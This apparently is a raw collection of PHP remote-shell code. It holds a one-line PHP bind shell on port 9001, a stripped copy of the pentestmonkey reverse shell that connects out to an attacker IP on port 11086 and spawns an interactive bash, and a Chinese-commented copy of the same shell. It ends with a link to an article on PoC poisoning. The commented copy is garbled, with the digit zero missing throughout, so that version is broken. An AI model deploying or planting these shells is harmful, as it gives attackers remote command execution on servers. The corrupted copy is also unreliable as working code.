php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",9001);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'

<?php// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php// Copyright (C) 2007 [email protected]set_time_limit (0);$VERSION = "1.0";$ip = 'ip';$port = 11086;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; bash -i';$daemon = 0;$debug = 0;if (function_exists('pcntl_fork')) {        $pid = pcntl_fork();        if ($pid == -1) {                printit("ERROR: Can't fork");                exit(1);        }        if ($pid) {                exit(0);  // Parent exits        }        if (posix_setsid() == -1) {                printit("Error: Can't setsid()");                exit(1);        }        $daemon = 1;} else {        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}chdir("/");umask(0);// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {        printit("$errstr ($errno)");        exit(1);}$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {        printit("ERROR: Can't spawn shell");        exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {        if (feof($sock)) {                printit("ERROR: Shell connection terminated");                break;        }        if (feof($pipes[1])) {                printit("ERROR: Shell process terminated");                break;        }        $read_a = array($sock, $pipes[1], $pipes[2]);        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);        if (in_array($sock, $read_a)) {                if ($debug) printit("SOCK READ");                $input = fread($sock, $chunk_size);                if ($debug) printit("SOCK: $input");                fwrite($pipes[0], $input);        }        if (in_array($pipes[1], $read_a)) {                if ($debug) printit("STDOUT READ");                $input = fread($pipes[1], $chunk_size);                if ($debug) printit("STDOUT: $input");                fwrite($sock, $input);        }        if (in_array($pipes[2], $read_a)) {                if ($debug) printit("STDERR READ");                $input = fread($pipes[2], $chunk_size);                if ($debug) printit("STDERR: $input");                fwrite($sock, $input);        }}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) {        if (!$daemon) {                print "$stringn";        }}?>

<?php// 设置脚本超时时间为，即无限期运行，不会因为PHP的默认超时设置而中断set_time_limit ();// 定义脚本版本$VERSION = "1.";// 定义攻击者的IP地址$ip = 'ip';// 定义攻击者监听的端口号$port = 11086;// 定义从socket或者shell读取数据的块大小$chunk_size = 140;// 定义写入和错误检查的空变量$write_a = null;$error_a = null;// 定义当连接建立时要执行的shell命令$shell = 'uname -a; w; id; bash -i';// 定义标志变量，如果成功创建守护进程则为1，否则为$daemon = ;// 定义调试标志，如果为1则打印调试信息，否则为$debug = ;// 检查是否可以使用pcntl_fork函数来创建子进程if (function_exists('pcntl_fork')) {    // 试图创建子进程    $pid = pcntl_fork();    // 如果创建失败，打印错误信息并退出    if ($pid == -1) {            printit("ERROR: Can't fork");            exit(1);    }    // 如果创建成功，父进程会得到子进程的PID，然后父进程退出    if ($pid) {            exit();  // Parent exits    }    // 将当前进程设置为新会话的领导者，这样可以脱离原会话、原进程组、原控制终端    if (posix_setsid() == -1) {            printit("Error: Can't setsid()");            exit(1);    }    // 如果成功创建守护进程，对应标志位设为1    $daemon = 1;// 如果不能创建子进程，打印警告信息但不退出} else {        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}// 更改当前工作目录到根目录，这样在执行命令或者脚本时就不会受到路径的限制chdir("/");// 改变当前的掩码，使得新创建的文件权限不受原有掩码影响umask();// 试图打开到攻击者定义的IP和端口的连接$sock = fsockopen($ip, $port, $errno, $errstr, 30);// 如果连接失败，打印错误信息并退出if (!$sock) {        printit("$errstr ($errno)");        exit(1);}// 定义进程的输入、输出、错误输出的描述符，这些描述符会被传递给进程$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);// 打开一个进程，执行定义好的shell命令$process = proc_open($shell, $descriptorspec, $pipes);// 如果进程打开失败，打印错误信息并退出if (!is_resource($process)) {        printit("ERROR: Can't spawn shell");        exit(1);}// 将4个流（socket、stdin、stdout、stderr）设置为非阻塞模式stream_set_blocking($pipes[], );stream_set_blocking```phpstream_set_blocking($pipes[1], );stream_set_blocking($pipes[2], );stream_set_blocking($sock, );// 打印成功建立反向Shell的信息printit("Successfully opened reverse shell to $ip:$port");// 主循环，用于处理从socket和shell进程中读取和写入数据while (1) {    // 如果socket连接被关闭，打印错误信息并跳出循环    if (feof($sock)) {        printit("ERROR: Shell connection terminated");        break;    }    // 如果shell进程被关闭，打印错误信息并跳出循环    if (feof($pipes[1])) {        printit("ERROR: Shell process terminated");        break;    }    // 定义要检查的读取流数组    $read_a = array($sock, $pipes[1], $pipes[2]);    // 使用stream_select函数检查哪些流有数据可读    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);    // 如果socket有数据可读，读取数据并写入到shell的stdin    if (in_array($sock, $read_a)) {        if ($debug) printit("SOCK READ");        $input = fread($sock, $chunk_size);        if ($debug) printit("SOCK: $input");        fwrite($pipes[], $input);    }    // 如果shell的stdout有数据可读，读取数据并写入到socket    if (in_array($pipes[1], $read_a)) {        if ($debug) printit("STDOUT READ");        $input = fread($pipes[1], $chunk_size);        if ($debug) printit("STDOUT: $input");        fwrite($sock, $input);    }    // 如果shell的stderr有数据可读，读取数据并写入到socket    if (in_array($pipes[2], $read_a)) {        if ($debug) printit("STDERR READ");        $input = fread($pipes[2], $chunk_size);        if ($debug) printit("STDERR: $input");        fwrite($sock, $input);    }}// 关闭socket连接和shell进程的所有流fclose($sock);fclose($pipes[]);fclose($pipes[1]);fclose($pipes[2]);// 关闭shell进程proc_close($process);// 定义用于打印信息的函数，如果当前不是守护进程模式则打印信息function printit ($string) {    if (!$daemon) {        print "$string";    }}?>

https://ti.qianxin.com/blog/articles/POC-Poisoning-Incident-Targeting-Security-Researchers-CN/